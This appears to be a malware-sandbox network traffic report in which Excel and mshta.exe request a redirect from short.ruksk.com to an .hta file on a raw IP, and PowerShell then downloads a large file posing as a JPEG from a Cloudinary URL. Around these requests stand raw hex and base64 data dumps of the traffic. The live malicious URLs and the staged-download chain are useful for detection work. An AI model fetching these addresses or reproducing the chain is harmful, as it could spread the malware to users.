                                                                                                                                                                                  Dec 3, 2024 14:01:53.980031967 CET1236INData Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
                                                                                                                                                                                  Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980043888 CET1236INData Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
                                                                                                                                                                                  Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980057001 CET1236INData Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
                                                                                                                                                                                  Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980264902 CET1236INData Raw: 51 64 4f 47 6e 44 70 35 38 5a 4f 61 6d 6a 68 35 73 58 4f 6d 6c 54 57 35 34 55 4f 66 6b 54 41 34 77 50 4f 33 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36
                                                                                                                                                                                  Data Ascii: QdOGnDp58ZOamjh5sXOmlTW54UOfkTA4wPO3jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8M
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980277061 CET1236INData Raw: 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44
                                                                                                                                                                                  Data Ascii: UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDp
                                                                                                                                                                                  Dec 3, 2024 14:01:53.980290890 CET1236INData Raw: 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43
                                                                                                                                                                                  Data Ascii: gNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuP
                                                                                                                                                                                  Dec 3, 2024 14:01:54.099817991 CET1236INData Raw: 69 6a 66 41 41 41 41 73 41 77 41 67 41 77 50 45 2f 7a 72 2f 6f 35 50 2f 51 6a 68 30 41 45 41 41 41 41 46 41 4d 41 45 41 4d 54 30 7a 51 4d 41 41 41 41 44 41 4d 41 41 41 38 54 39 2f 38 39 50 4a 2f 7a 6d 41 41 41 41 51 41 67 41 77 44 41 41 41 49 7a
                                                                                                                                                                                  Data Ascii: ijfAAAAsAwAgAwPE/zr/o5P/Qjh0AEAAAAFAMAEAMT0zQMAAAADAMAAA8T9/89PJ/zmAAAAQAgAwDAAAIzAxQfMjHTxxYLAAAAFAIA4AAAA5IUOhkzD5AAOaDAAAQBACAMA1wAN+Tz70UOAAAAEAIAsAwjS84DPgsz+7Q+ODCAAAQBACAKAAAAOdhzU4MxNKYz+2AvNlbj220sN5aTqAAAAgAgAACgP45Dd+AnPs5Da+QmPg5DX


                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.224916554.150.207.1314433312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-03 13:00:55 UTC397OUTGET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: short.ruksk.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-03 13:00:55 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:00:55 GMT
                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-03 13:00:55 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.224916754.150.207.1314433588C:\Windows\System32\mshta.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-03 13:00:59 UTC421OUTGET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: fr-FR
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: short.ruksk.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-03 13:01:00 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:00 GMT
                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-03 13:01:00 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.224917054.150.207.1314433312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-03 13:01:16 UTC397OUTGET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: short.ruksk.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-03 13:01:17 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:16 GMT
                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-03 13:01:17 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.224917454.150.207.1314434084C:\Windows\System32\mshta.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-03 13:01:21 UTC421OUTGET /MJoi1u?&hosiery=imminent&basketball=innate&greece=brash&board=wee&pacemaker HTTP/1.1
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Language: fr-FR
                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                  Host: short.ruksk.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-03 13:01:21 UTC484INHTTP/1.1 302 Found
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:21 GMT
                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  Location: http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta
                                                                                                                                                                                  Vary: Accept
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-03 13:01:21 UTC104INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 32 2e 39 33 2e 36 35 2e 31 36 31 2f 78 61 6d 70 70 2f 77 73 2f 6e 69 63 65 77 6f 72 6b 69 6e 67 70 65 72 73 6f 6e 77 69 74 68 68 65 72 67 69 72 6c 66 72 69 65 6e 64 73 68 65 69 73 62 65 61 75 74 69 66 75 6c 2e 68 74 61
                                                                                                                                                                                  Data Ascii: Found. Redirecting to http://142.93.65.161/xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.2249176151.101.65.1374432112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-03 13:01:34 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                                                                                  Host: res.cloudinary.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-03 13:01:34 UTC750INHTTP/1.1 200 OK
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Content-Length: 2230233
                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                  Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                                                                                  Date: Tue, 03 Dec 2024 13:01:34 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                  Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                                                                                  Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-03T13:01:34.667Z;desc=hit,rtt;dur=177,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                                                                                                                  Server: Cloudinary
                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                  x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                                                                                  Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                                                                                  Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                                                                                  Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                                                                  Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                                                                  Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                                                                  Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
